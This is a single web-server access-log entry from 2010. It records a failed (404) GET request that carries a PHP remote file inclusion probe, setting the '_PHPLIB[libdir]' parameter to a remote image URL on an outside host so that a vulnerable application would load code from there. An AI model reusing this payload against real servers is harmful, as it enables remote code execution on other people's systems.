69.175.97.18 - - [06/May/2010:09:31:52 -0500] "GET /logs/access_log.1262390400//?_PHPLIB[libdir]=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
